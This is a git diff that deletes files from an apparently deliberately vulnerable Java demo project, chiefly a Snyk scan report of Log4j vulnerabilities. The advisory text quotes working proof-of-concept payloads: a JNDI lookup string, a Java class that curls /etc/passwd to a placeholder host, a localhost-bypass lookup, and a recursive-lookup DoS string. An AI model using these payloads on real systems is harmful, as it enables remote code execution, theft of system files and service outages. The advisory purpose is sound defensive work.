674dfea43184e1"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/repository/api/UserRepository.java":[2317,1707749068018.204,"dd3a1c73160008585fac38906516ee38a4c1ef58b1d8dca35b3c62a160318178"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/repository/impl/TodoRepositoryImpl.java":[3171,1707749068018.3552,"80a2b851d940654643a460c2caae7ae6c2388353e7f9f50ae7c00df84cff1b57"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/repository/impl/UserRepositoryImp
l.java":[3163,1707749068018.4534,"78b6b47b4356741a6f46104bade197655e9dd6064821d8bce20fd555f97880b5"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/service/api/TodoService.java":[2585,1707749068018.6626,"2633068fbc59901a47a3a3bc9ae24be71a1f89f5bcbab9b88a69fdce4aa77b14"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/service/api/UserService.java":[2298,1707749068018.7725,"3dca704e01dcd28b8745421c21b4dc83f89020f5a0806f166bfee124f476a1b8"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/service/impl/TodoServiceImpl.java":[2798,1707749068018.8906,"ff7c4f6a14b51f6918b875849eba94d08cd041ea4262a5ba232f4c4724e3a117"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/service/impl/UserServiceImpl.java":[2591,1707749068018.9702,"d44ca42fecf28dfe4c6a0ecc2a0bfacde4c97fffde20fe876a8fd1fce6184c97"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/AboutAction.java":[1593,1707749068023.9092,"aac0c815b65e7aa372635e13a1874b97404796162fdab3c8a2db8ccc665bfb77"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/BaseAction.java":[2755,1707749068024.01,"818c334580003a9059f8b9e343eee5527397c1cd54408a278c1e42c1c498af03"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/IndexAction.java":[1474,1707749068024.1094,"2b1fe3a7d1afc307195a1803b64955b233d41e26a0d5b38b8029c794ed5f0463"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/interceptor/LoginInterceptor.java":[2204,1707749068025.1648,"b4ae8f17a0cc66a14234de9f635874e100546098e5e67
b7999beade579019b15"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/tags/HighlightTag.java":[3515,1707749068021.8755,"67df60f194c628b276134716f0d43d102d18a4ffdc5bcbd4afe834ad50f8af28"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/tags/PriorityIconTag.java":[2167,1707749068022.0413,"b24e9381e1690b8c0ca9535c6fd50d472311f00bd520b4ceadd98d2b5ce80d85"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/tags/StatusLabelTag.java":[2085,1707749068022.2034,"af0925afa455c491d83245a16a39c98ac8fec45b4b035070a15d60ef47cfe074"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/tags/StatusStyleTag.java":[2105,1707749068022.3518,"82c42e37d2c6c02fc69297379a8183dd8bc8bbd80d29fca2a0868e7a532a1f95"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/form/ChangePasswordForm.java":[2569,1707749068021.3772,"f1b0c8025daf900938caf746a85fe7df9cfeef0b85e7525eecc345daddacec83"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/form/LoginForm.java":[2097,1707749068021.4858,"303ba1f62ae2a9251c7fd1e1132bc91c6dbeacb760f0f8bad4d8f802b48bf4c7"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/form/RegistrationForm.java":[2783,1707749068021.578,"65958478e6c6df53811e97bd5a0e54489272be2e06bfb3a14641922c11e1dc1c"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/src/main/java/io/github/benas/todolist/web/common/util/TodoListUtils.java":[4018,1707749068022.542,"a743f24c83b6992948cb46bf8b2bd4d4b1c11dfd41a81c66c584d80d
3b77e0a4"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/todo/SearchTodoAction.java":[2347,1707749068024.2808,"23c393191001a8548c66a6112786261fd8821fea6ecbcbaded85ffc695c65499"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/todo/TodoAction.java":[4174,1707749068024.5068,"f779cf49f727c3a070c3e17ecb29d4d1c8cc9844158393e7baad575f86c9f311"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/AccountAction.java":[11846,1707749068024.6938,"70d6b7ad7b556b98b17dd858b269daed067f4d0f4b6f2d7079c599e469d86168"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/FilesAction.java":[2536,1707749068024.7944,"e47d909ef3e3a224f723c2dbdd6b35ee131064090570cdcf3ec0a514efa8767d"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/HomeAction.java":[2513,1707749068024.883,"142a48bf4f5665546d1168347897fac76cae74d361f9f6a9476c6b90d8c3dc12"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/SessionAction.java":[3351,1707749068024.9883,"25a2fbf3e1485401fe11418e42e76149b0f2ec38a1a6dc3dde038be9e0be28d9"]} \ No newline at end of file diff --git a/index.html b/index.html deleted file mode 100644 index 342510837f..0000000000 --- a/index.html +++ /dev/null @@ -1 +0,0 @@ -HTTP Status 429 – Too Many Requests

HTTP Status 429 – Too Many Requests


Type Status Report

Message Rate limit exceeded

Description The user has sent too many requests in a given amount of time ("rate limiting").


\ No newline at end of file diff --git a/output.json b/output.json deleted file mode 100644 index 45a7eb4404..0000000000 --- a/output.json +++ /dev/null 
@@ -1,65575 +0,0 @@ -[ - { - "vulnerabilities": [], - "ok": true, - "dependencyCount": 0, - "org": "austin.doll", - "policy": "# Snyk (https://snyk.io) policy file, patches or ignores known vulnerabilities.\nversion: v1.25.1\nignore: {}\npatch: {}\nexclude:\n global:\n - todolist-goof/exploits/zip-slip.py\n", - "isPrivate": true, - "licensesPolicy": { - "severities": {}, - "orgLicenseRules": { - "AGPL-1.0": { - "licenseType": "AGPL-1.0", - "severity": "high", - "instructions": "" - }, - "AGPL-3.0": { - "licenseType": "AGPL-3.0", - "severity": "high", - "instructions": "" - }, - "Artistic-1.0": { - "licenseType": "Artistic-1.0", - "severity": "medium", - "instructions": "" - }, - "Artistic-2.0": { - "licenseType": "Artistic-2.0", - "severity": "medium", - "instructions": "" - }, - "CDDL-1.0": { - "licenseType": "CDDL-1.0", - "severity": "medium", - "instructions": "" - }, - "CPOL-1.02": { - "licenseType": "CPOL-1.02", - "severity": "high", - "instructions": "" - }, - "EPL-1.0": { - "licenseType": "EPL-1.0", - "severity": "medium", - "instructions": "" - }, - "GPL-2.0": { - "licenseType": "GPL-2.0", - "severity": "high", - "instructions": "" - }, - "GPL-3.0": { - "licenseType": "GPL-3.0", - "severity": "high", - "instructions": "" - }, - "LGPL-2.0": { - "licenseType": "LGPL-2.0", - "severity": "medium", - "instructions": "" - }, - "LGPL-3.0": { - "licenseType": "LGPL-3.0", - "severity": "medium", - "instructions": "" - }, - "MPL-1.1": { - "licenseType": "MPL-1.1", - "severity": "medium", - "instructions": "" - }, - "MPL-2.0": { - "licenseType": "MPL-2.0", - "severity": "medium", - "instructions": "" - }, - "MS-RL": { - "licenseType": "MS-RL", - "severity": "medium", - "instructions": "" - }, - "SimPL-2.0": { - "licenseType": "SimPL-2.0", - "severity": "high", - "instructions": "" - }, - "LGPL-2.1": { - "licenseType": "LGPL-2.1", - "severity": "medium", - "instructions": "" - } - } - }, - "packageManager": "maven", - "ignoreSettings": { - "adminOnly": false, - 
"reasonRequired": true, - "disregardFilesystemIgnores": false - }, - "summary": "No known vulnerabilities", - "filesystemPolicy": true, - "uniqueCount": 0, - "projectName": "io.github.snyk:java-goof", - "foundProjectCount": 7, - "displayTargetFile": "pom.xml", - "hasUnknownVersions": false, - "path": "/Users/austindoll/Documents/GitHub/java-goof" - }, - { - "vulnerabilities": [], - "ok": true, - "dependencyCount": 0, - "org": "austin.doll", - "policy": "# Snyk (https://snyk.io) policy file, patches or ignores known vulnerabilities.\nversion: v1.25.1\nignore: {}\npatch: {}\n", - "isPrivate": true, - "licensesPolicy": { - "severities": {}, - "orgLicenseRules": { - "AGPL-1.0": { - "licenseType": "AGPL-1.0", - "severity": "high", - "instructions": "" - }, - "AGPL-3.0": { - "licenseType": "AGPL-3.0", - "severity": "high", - "instructions": "" - }, - "Artistic-1.0": { - "licenseType": "Artistic-1.0", - "severity": "medium", - "instructions": "" - }, - "Artistic-2.0": { - "licenseType": "Artistic-2.0", - "severity": "medium", - "instructions": "" - }, - "CDDL-1.0": { - "licenseType": "CDDL-1.0", - "severity": "medium", - "instructions": "" - }, - "CPOL-1.02": { - "licenseType": "CPOL-1.02", - "severity": "high", - "instructions": "" - }, - "EPL-1.0": { - "licenseType": "EPL-1.0", - "severity": "medium", - "instructions": "" - }, - "GPL-2.0": { - "licenseType": "GPL-2.0", - "severity": "high", - "instructions": "" - }, - "GPL-3.0": { - "licenseType": "GPL-3.0", - "severity": "high", - "instructions": "" - }, - "LGPL-2.0": { - "licenseType": "LGPL-2.0", - "severity": "medium", - "instructions": "" - }, - "LGPL-3.0": { - "licenseType": "LGPL-3.0", - "severity": "medium", - "instructions": "" - }, - "MPL-1.1": { - "licenseType": "MPL-1.1", - "severity": "medium", - "instructions": "" - }, - "MPL-2.0": { - "licenseType": "MPL-2.0", - "severity": "medium", - "instructions": "" - }, - "MS-RL": { - "licenseType": "MS-RL", - "severity": "medium", - "instructions": "" - }, - 
"SimPL-2.0": { - "licenseType": "SimPL-2.0", - "severity": "high", - "instructions": "" - }, - "LGPL-2.1": { - "licenseType": "LGPL-2.1", - "severity": "medium", - "instructions": "" - } - } - }, - "packageManager": "maven", - "ignoreSettings": { - "adminOnly": false, - "reasonRequired": true, - "disregardFilesystemIgnores": false - }, - "summary": "No known vulnerabilities", - "filesystemPolicy": false, - "uniqueCount": 0, - "projectName": "io.snyk:log4shell-poc", - "foundProjectCount": 7, - "displayTargetFile": "log4shell-goof/pom.xml", - "hasUnknownVersions": false, - "path": "/Users/austindoll/Documents/GitHub/java-goof" - }, - { - "vulnerabilities": [ - { - "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720", - "title": "Remote Code Execution (RCE)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H", - "credit": [ - "Chen Zhaojun of Alibaba Cloud Security Team" - ], - "semver": { - "vulnerable": [ - "[2.0-beta9,2.3.1)", - "[2.4,2.12.2)", - "[2.13.0,2.15.0)" - ] - }, - "exploit": "High", - "fixedIn": [ - "2.3.1", - "2.12.2", - "2.15.0" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 10, - "functions": [ - { - "version": [ - "[2.0-beta9,2.3.1)", - "[2.4,2.12.2)", - "[2.13.0,2.15.0)" - ], - "functionId": { - "filePath": "org/apache/logging/log4j/core/lookup/JndiLookup.java", - "className": "JndiLookup", - "functionName": "lookup" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.logging.log4j:log4j-core", - "references": [ - { - "url": "https://issues.apache.org/jira/browse/LOG4J2-3198", - "title": "Apache Jira Issues" - }, - { - "url": "https://issues.apache.org/jira/browse/LOG4J2-3201", - "title": "Apache Jira Issues" - }, - { - "url": "https://logging.apache.org/log4j/2.x/security.html", - "title": "Apache Security Advisory" - }, - { - "url": "https://github.com/apache/logging-log4j2/pull/608", - "title": "GitHub PR" - }, - { - "url": 
"https://github.com/Kirill89/log4shell-vulnerable-server", - "title": "PoC" - }, - { - "url": "https://snyk.io/blog/log4j-rce-log4shell-vulnerability-cve-2021-4428/", - "title": "Snyk Blog and Vulnerability Breakdown" - }, - { - "url": "https://www.exploit-db.com/exploits/51183", - "title": "Exploit DB" - }, - { - "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", - "title": "CISA - Known Exploited Vulnerabilities" - }, - { - "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-44228.yaml", - "title": "Nuclei Templates" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", - "cvssV3BaseScore": 10, - "modificationTime": "2024-03-11T09:48:46.605332Z" - }, - { - "assigner": "Red Hat", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:53:58.520882Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 10, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:09:43.264835Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 10, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:46.605332Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:58.520882Z" - } - ], - "description": "## Overview\n\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE).\nApache Log4j2 JNDI 
features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.\r\n\r\nFrom log4j 2.15.0, JNDI LDAP endpoints are restricted to localhost by default.\r\n\r\n\r\n## PoC\r\nWhen an application uses log4j to log user input, an attacker can exploit this vulnerability, by supplying a malicious string that the application logs - for example, `${jndi:ldap://someurl/Evil}`. This causes the application to execute a malicious class supplied by an attacker’s LDAP server (`someurl/Evil` in this example).\r\n\r\nFor example, the vulnerability can be used to inject this malicious class into an application:\r\n```java\r\npublic class Evil implements ObjectFactory {\r\n @Override\r\n public Object getObjectInstance (Object obj, Name name, Context nameCtx, Hashtable environment) throws Exception {\r\n Runtime.getRuntime().exec(\"curl -F 'file=@/etc/passw‍đ' https://someurl/upload\");\r\n return null;\r\n }\r\n}\r\n```\r\nThis causes the application to disclose the `etc/passwd` file on the system, and send it to a remote attacker.\r\n\r\n## Further Remediation Options\r\nIf upgrading the version is not possible, we strongly recommend to mitigate the vulnerability using one of these methods:\r\n\r\n* Remove `JndiLookup.class` from the class path (i.e: `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`. While not pertinent to log4shell, consider also removing `JndiManager`, `JMSAppender` and `SMTPAppender` if you are not using them, as there are unconfirmed reports they could be leveraged in similar attacks in the future.\r\n* Partial mitigation: disable lookups via system properties or environmental variables. 
If you use log4j >=2.10.0, you can set the system property `LOG4J_FORMAT_MSG_NO_LOOKUPS` or the environmental variable `Dlog4j2.formatMsgNoLookups` to `true`. (RCE is possible in some non-default Pattern Layout configurations that use a Context Lookup or a Thread Context Map pattern.)\r\n\r\n
Upgrading your JDK versions is not enough to mitigate this vulnerability in all circumstances, as it was proven that setting the `com.sun.jndi.ldap.object.trustURLCodebase` property to `false` is not enough.\r\n
For more remediation advice, please visit the [Log4j Remediation Cheat Sheet](https://snyk.io/blog/log4shell-remediation-cheat-sheet/) post.\r\n\r\n\r\n**Note**: `org.apache.logging.log4j:log4j-api` was originally deemed vulnerable, but Apache maintainers have since [clarified](https://issues.apache.org/jira/browse/LOG4J2-3201) that this only affects `org.apache.logging.log4j:log4j-core`.\n\n## Remediation\n\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.2, 2.15.0 or higher.\n\n\nUse [this guide](https://snyk.io/blog/find-fix-log4shell-quickly-snyk/) to scan your projects for the Log4Shell vulnerability.\n\n## References\n\n- [Apache Jira Issues](https://issues.apache.org/jira/browse/LOG4J2-3198)\n\n- [Apache Jira Issues](https://issues.apache.org/jira/browse/LOG4J2-3201)\n\n- [Apache Security Advisory](https://logging.apache.org/log4j/2.x/security.html)\n\n- [GitHub PR](https://github.com/apache/logging-log4j2/pull/608)\n\n- [PoC](https://github.com/Kirill89/log4shell-vulnerable-server)\n\n- [Snyk Blog and Vulnerability Breakdown](https://snyk.io/blog/log4j-rce-log4shell-vulnerability-cve-2021-4428/)\n\n- [Exploit DB](https://www.exploit-db.com/exploits/51183)\n\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-44228.yaml)\n", - "epssDetails": { - "percentile": "0.99999", - "probability": "0.97556", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2021-44228" - ], - "CWE": [ - "CWE-94" - ], - "GHSA": [ - "GHSA-jfh8-c2jp-5v3q" - ] - }, - "packageName": "org.apache.logging.log4j:log4j-core", - "proprietary": false, - "creationTime": "2021-12-10T10:08:46.155884Z", - "functions_new": [ - { - "version": [ - "[2.0-beta9,2.3.1)", - "[2.4,2.12.2)", - "[2.13.0,2.15.0)" - ], - "functionId": { - "className": "org.apache.logging.log4j.core.lookup.JndiLookup", - 
"functionName": "lookup" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-12-10T10:02:55Z", - "exploitDetails": { - "sources": [ - "CISA", - "ExploitDB", - "Nuclei Templates", - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "High", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Attacked", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.logging.log4j", - "artifactId": "log4j-core" - }, - "publicationTime": "2021-12-10T10:10:01Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-06-03T08:53:25.500242Z", - "socialTrendAlert": false, - "severityWithCritical": "critical", - "from": [ - "io.snyk:log4shell-client@0.0.1-SNAPSHOT", - "org.apache.logging.log4j:log4j-core@2.14.1" - ], - "upgradePath": [ - false, - "org.apache.logging.log4j:log4j-core@2.15.0" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.logging.log4j:log4j-core", - "version": "2.14.1" - }, - { - "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2320014", - "title": "Remote Code Execution (RCE)", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H/RL:O/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.0-beta9,2.3.1)", - "[2.4,2.12.2)", - "[2.13.0,2.16.0)" - ] - }, - "exploit": "High", - "fixedIn": [ - "2.3.1", - "2.12.2", - "2.16.0" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.logging.log4j:log4j-core", - "references": [ - { - "url": "https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88f", - "title": "Apache Pony Mail" - }, - { - "url": "https://logging.apache.org/log4j/2.x/security.html", - "title": "Apache Security Page" - }, - { - "url": "https://twitter.com/marcioalm/status/1471740771581652995", - "title": "Twitter Post" - }, - { - "url": 
"https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-45046.yaml", - "title": "Nuclei Templates" - }, - { - "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", - "title": "CISA - Known Exploited Vulnerabilities" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", - "cvssV3BaseScore": 9, - "modificationTime": "2024-03-11T09:51:51.455756Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:56.296034Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:32.295395Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:51.455756Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:56.296034Z" - } - ], - "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) if one of the following conditions is met:\r\n\r\n1. Logging configuration explicitly enables lookups – either by default (if using a version lower than 2.15.0) or manually by using `%m{lookups}` as `formatMsgNoLookups` is switched on by default as of version 2.15.0.\r\n2. 
Or uses a non-default Pattern Layout with Context Lookup where attackers can control input data via Thread Context Map (MDC),\r\n3. Or uses `Logger.printf(\"%s\", userInput)` function where attackers can control the userInput variable.\r\n\r\nA malicious actor is able to bypass the mitigation implemented in version 2.15.0 that limits JNDI lookups to localhost only: `${jndi:ldap://127.0.0.1#evilhost.com:1389/a}`.\r\n\r\nWe recommend updating to version 2.16.0 which completely disables JNDI lookups by default. If upgrading is not an option, this issue can be mitigated in prior releases by removing the `JndiLookup` class from the classpath (example: `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`).\r\n\r\n### PoC\r\n\r\nIn config:\r\n```\r\n%d %p %c{1.} [%t] $${ctx:loginId} %m%n\r\n```\r\n\r\nIn code:\r\n```java\r\nThreadContext.put(\"loginId\", UserControlledInput);\r\n```\r\n\r\n### History\r\n\r\nThis vulnerability was previously assigned a CVSS score of 3.7 (Low), and the impact was believed to be Denial of Service (DoS).\r\n\r\nFurthermore, the advisory previously mentioned Thread Context Map patterns (%X, %mdc, or %MDC) as being vulnerable to this issue, but that has since been proven wrong.\r\n\r\nOn December 17, 2021 new information came to light, demonstrating that an Arbitrary Code Execution vulnerability still exists in version 2.15.0 of Log4j due to a bypass to the localhost-only lookup mechanism.\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.2, 2.16.0 or higher.\n## References\n- [Apache Pony Mail](https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88f)\n- [Apache Security Page](https://logging.apache.org/log4j/2.x/security.html)\n- [Twitter Post](https://twitter.com/marcioalm/status/1471740771581652995)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-45046.yaml)\n- [CISA - Known Exploited 
Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n", - "epssDetails": { - "percentile": "0.99913", - "probability": "0.97364", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2021-45046" - ], - "CWE": [ - "CWE-94" - ], - "GHSA": [ - "GHSA-7rjr-3q55-vv33" - ] - }, - "packageName": "org.apache.logging.log4j:log4j-core", - "proprietary": false, - "creationTime": "2021-12-14T18:28:31.339218Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2021-12-14T18:01:28Z", - "exploitDetails": { - "sources": [ - "CISA", - "Nuclei Templates", - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "High", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Attacked", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.logging.log4j", - "artifactId": "log4j-core" - }, - "publicationTime": "2021-12-14T18:44:00Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-06-03T08:53:25.837600Z", - "socialTrendAlert": false, - "severityWithCritical": "critical", - "from": [ - "io.snyk:log4shell-client@0.0.1-SNAPSHOT", - "org.apache.logging.log4j:log4j-core@2.14.1" - ], - "upgradePath": [ - false, - "org.apache.logging.log4j:log4j-core@2.16.0" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.logging.log4j:log4j-core", - "version": "2.14.1" - }, - { - "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2321524", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", - "credit": [ - "Hideki Okamoto of Akamai Technologies" - ], - "semver": { - "vulnerable": [ - "[2.0-beta9,2.3.1)", - "[2.4,2.12.3)", - "[2.13.0,2.17.0)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.3.1", - "2.12.3", - "2.17.0" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [], - "malicious": 
false, - "isDisputed": false, - "moduleName": "org.apache.logging.log4j:log4j-core", - "references": [ - { - "url": "https://logging.apache.org/log4j/2.x/security.html", - "title": "Apache Security" - }, - { - "url": "https://issues.apache.org/jira/browse/LOG4J2-3230", - "title": "JIRA Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 5.9, - "modificationTime": "2024-03-11T09:51:51.570474Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 5.9, - "modificationTime": "2024-03-11T09:53:58.516498Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:38.288854Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.9, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:51.570474Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 5.9, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:58.516498Z" - } - ], - "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). Does not protect against uncontrolled recursion from self-referential lookups. 
\r\n\r\nWhen the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, `$${ctx:loginId}`), attackers with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup, resulting in a `StackOverflowError` that will terminate the process.\r\n\r\n### PoC\r\n\r\nIn `log4j.properties`:\r\n```java\r\nappender.console.type = Console\r\nappender.console.name = console\r\nappender.console.layout.type = PatternLayout\r\nappender.console.layout.pattern = !${ctx:test}! %m%n\r\nrootLogger.level = ALL\r\nrootLogger.appenderRef.file.ref = console\r\n```\r\n\r\nIn `Main.java`:\r\n```java\r\nThreadContext.put(\"test\", \"${::-${ctx:test}}\");\r\nlogger.error(\"boom\"); // Will not be logged\r\n```\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in 